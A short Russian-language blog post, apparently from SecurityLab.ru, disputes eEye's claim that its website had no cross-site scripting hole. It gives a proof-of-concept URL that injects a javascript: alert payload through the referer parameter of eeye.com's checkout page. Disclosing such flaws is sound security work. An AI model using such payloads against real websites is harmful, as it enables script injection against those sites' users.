XSS на eEye.com

Security
XSS на eEye.com
Компания eEye утверждает что на их сайте не было XSS. Собственно, а что следовало ожидать от компании, которая не способна защитить свой web стайт?

Example:
Follow the link and press the "Back" button.

www.eeye.com//~apps/shop/checkout.asp?referer=javascript: alert('www.securitylab.ru')&rnd=060816.123112.125229.323
Security
Alt text
Обращаем внимание, что все материалы в этом блоге представляют личное мнение их авторов. Редакция SecurityLab.ru не несет ответственности за точность, полноту и достоверность опубликованных данных. Вся информация предоставлена «как есть» и может не соответствовать официальной позиции компании.

Присоединяйся к сообществу ИБ-специалистов

Обменивайся опытом, решай реальные задачи и прокачивай навыки вместе с экспертами на Standoff Defend*.

Присоединяйся уже сейчас

*Защищать. Реклама. АО «Позитив Текнолоджиз», ИНН 7718668887


article-title

Валерий Марчук

Блог посвящен безопасности и жизни секлаба